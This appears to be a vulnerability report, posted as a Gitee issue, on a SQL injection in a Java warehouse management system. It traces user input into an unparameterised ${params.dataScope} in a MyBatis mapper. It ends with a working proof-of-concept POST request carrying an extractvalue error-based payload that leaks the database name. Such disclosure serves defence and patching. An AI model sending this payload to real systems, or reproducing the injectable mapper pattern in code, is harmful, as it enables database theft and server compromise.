SQL injection vulnerability on /system/role/authUser/allocatedList

# Summary

In the latest version, a parameter passed to the endpoint `/system/role/authUser/allocatedList` are user-controllable and not sanitized, and no prepared statements are used when executing the final SQL query, resulting in a SQL injection vulnerability. Attackers can exploit this vulnerability to obtain sensitive data from the database and even gain complete control of the server.

---

# Details

### taint analysis:

- wms-admin/src/main/java/com/deer/wms/admin/controller/system/SysRoleController.java
```
@RequiresPermissions("system:role:list")
@PostMapping("/authUser/allocatedList")
@ResponseBody
public TableDataInfo allocatedList(SysUser user)
{
    startPage();
    List<SysUser> list = userService.selectAllocatedList(user);
    return getDataTable(list);
}
```

- wms-system/src/main/resources/mapper/system/SysUserMapper.xml
```
<select id="selectAllocatedList" parameterType="SysUser" resultMap="SysUserResult">
    select distinct u.user_id, u.dept_id, u.login_name, u.user_name, u.email, u.phonenumber, u.status, u.create_time
    from sys_user u
        left join sys_dept d on u.dept_id = d.dept_id
        left join sys_user_role ur on u.user_id = ur.user_id
        left join sys_role r on r.role_id = ur.role_id
    where u.del_flag = '0' and r.role_id = #{roleId}
    <if test="loginName != null and loginName != ''">
       AND u.login_name like concat('%', #{loginName}, '%')
    </if>
    <if test="phonenumber != null and phonenumber != ''">
       AND u.phonenumber like concat('%', #{phonenumber}, '%')
    </if>
    
    ${params.dataScope}
</select>
```

---

# POC
```
POST /system/role/authUser/allocatedList HTTP/1.1
Host: 127.0.0.1:7001
Cookie: JSESSIONID=5ffda3ab-8334-4505-8dc6-ed991f34df48
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Connection: close

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

```
![输入图片说明](https://foruda.gitee.com/images/1752228008062651399/c9bf9497_8279293.png "屏幕截图")---

# Impact
https://portswigger.net/web-security/sql-injection#what-is-the-impact-of-a-successful-sql-injection-attack

---

wms仓库管理系统/立体仓库WMS

内容风险标识

评论 (0)

wms仓库管理系统/立体仓库WMS .gitee-modal { width: 500px !important; }

内容风险标识